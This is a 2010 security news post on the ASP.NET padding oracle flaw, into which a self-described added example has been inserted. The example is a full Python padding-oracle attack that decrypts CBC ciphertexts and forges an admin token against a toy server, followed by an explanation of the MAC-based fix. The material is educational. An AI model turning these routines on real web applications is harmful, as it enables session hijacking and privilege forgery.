News
Padding Oracle Attack Affects Every ASP.NET Web App - Patch Now
Published: Wednesday, September 29, 2010 | Posted By: Dennis
Microsoft is issuing an out-of-band patch this week for a flaw in how ASP.NET handles its encrypted data. The underlying attack has been known for several years, but back then it was mostly used as a lesson to make programmers and website architects more careful about how they designed their sites.
This time, however, no amount of care in the application code avoids it: the data an attacker targets is what the framework itself encrypts and depends on to run, namely the encrypted session data and cookies ASP.NET issues. An attacker who can decrypt and tamper with those has the application.
Crypto isn't really my thing; however, this article (and the ones it links to) is pretty good at explaining the issue at hand.
"We knew ASP.NET was vulnerable to our attack several months ago, but we didn't know how serious it is until a couple of weeks ago. It turns out that the vulnerability in ASP.NET is the most critical amongst other frameworks. In short, it totally destroys ASP.NET security," said Thai Duong, who along with Juliano Rizzo, developed the attack against ASP.NET.
The pair have developed a tool specifically for use in this attack, called the Padding Oracle Exploit Tool. Their attack is an application of a technique that's been known since at least 2002, when Serge Vaudenay presented a paper on the topic at Eurocrypt.
Funny thing is, I heard about this issue back in 2002, but it was considered a minor flaw since most examples showed that with proper use of error messages and proper application failover you could protect yourself from the attack.
The reality is far worse
In addition, an attacker does not need distinct error messages to pull this off: any observable difference in how the application handles a ciphertext with bad padding, such as a different response code or a difference in response time, is a side channel that leaks the same one bit of information.
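To make the mechanism concrete, here is an added example of the attack itself; it is not code from this post, from Duong and Rizzo's tool, or from Microsoft. A CBC implementation whose padding check fails in a distinguishable way leaks one bit per query, and that bit is enough to decrypt any ciphertext and to forge new ones without ever learning the key. The block cipher is a toy HMAC-SHA256 Feistel network standing in for AES so the script runs with only the standard library (the attack is cipher-independent and touches only the oracle); the `LeakyServer` class, the `ticket:` messages and all function names are constructed for this example.

```python
"""Padding-oracle attack on CBC/PKCS#7 (added example, stdlib only): the block cipher is a toy HMAC-SHA256 Feistel network standing in for AES; the attack never sees the key."""
import hashlib, hmac, os

BLOCK = 16

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    # Feistel round function: keyed, round-numbered HMAC truncated to 8 bytes.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in range(8):
        left, right = right, xor(left, _f(key, rnd, right))
    return left + right

def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(8)):
        left, right = xor(right, _f(key, rnd, left)), left
    return left + right

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # this distinguishable failure is the oracle
    return data[:-n]

def cbc_encrypt(key: bytes, plaintext: bytes) -> bytes:
    padded, prev = pkcs7_pad(plaintext), os.urandom(BLOCK)
    out = [prev]  # output layout is IV || C1 || ... || Cn
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key: bytes, ct: bytes) -> bytes:
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return pkcs7_unpad(b"".join(xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:])))

class LeakyServer:
    # Constructed stand-in for a server whose response reveals whether padding was valid.
    def __init__(self) -> None:
        self.key = os.urandom(32)

    def padding_is_valid(self, ct: bytes) -> bool:
        # In a real deployment this one bit is an error page, a status code or a timing difference.
        try:
            cbc_decrypt(self.key, ct)
            return True
        except ValueError:
            return False

def recover_intermediate(oracle, target: bytes) -> bytes:
    # Recover D_k(target) byte by byte; the attacker controls the block XORed into it.
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        forged = bytearray(BLOCK)
        forged[pos + 1:] = bytes(b ^ pad for b in inter[pos + 1:])  # known bytes decrypt to `pad`
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:
                # Edge case: an accidental 0x02 0x02 (or longer) also passes; flipping the left neighbour leaves only a true 0x01 valid.
                probe = bytearray(forged)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe) + target):
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle never accepted a byte; not a padding oracle?")
    return bytes(inter)

def decrypt_via_oracle(oracle, ct: bytes) -> bytes:
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return pkcs7_unpad(b"".join(xor(recover_intermediate(oracle, c), p) for p, c in zip(blocks, blocks[1:])))

def encrypt_via_oracle(oracle, plaintext: bytes) -> bytes:
    # Forge a ciphertext for chosen plaintext without the key, building blocks last to first.
    padded = pkcs7_pad(plaintext)
    out = [os.urandom(BLOCK)]  # the final ciphertext block can be anything
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        out.append(xor(recover_intermediate(oracle, out[-1]), padded[i:i + BLOCK]))
    return b"".join(reversed(out))

def demo():
    # Constructed scenario: read a victim's token, then forge an elevated one, never seeing the key.
    server = LeakyServer()
    token = decrypt_via_oracle(server.padding_is_valid, cbc_encrypt(server.key, b"ticket: user=alice; role=user"))
    forged = encrypt_via_oracle(server.padding_is_valid, b"ticket: user=alice; role=admin")
    return token, cbc_decrypt(server.key, forged)
```

Each plaintext byte costs at most 256 oracle queries, so a 16-byte block falls in a few thousand requests, which is why the attack is "just a matter of time" rather than a matter of luck. Note that the oracle above returns a boolean; it makes no difference to the attacker whether that bit comes from a different error page, an HTTP status code or a measurable timing gap, so hiding the message alone does not close the hole. The durable fix is to authenticate the ciphertext (for example with a MAC checked before any decryption takes place) so that a tampered block is rejected before padding is ever examined.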
"It's worth noting that the attack is 100% reliable, i.e. one can be sure that once they run the attack, they can exploit the target. It's just a matter of time. If the attacker is lucky, then he can own any ASP.NET website in seconds. The average time for the attack to complete is 30 minutes. The longest time it ever takes is less than 50 minutes," Duong said.
Needless to say, I'll be patching my systems sooner rather than later.
Related Web URL: http://threatpost.com/en_us/blogs/new-crypto-attac...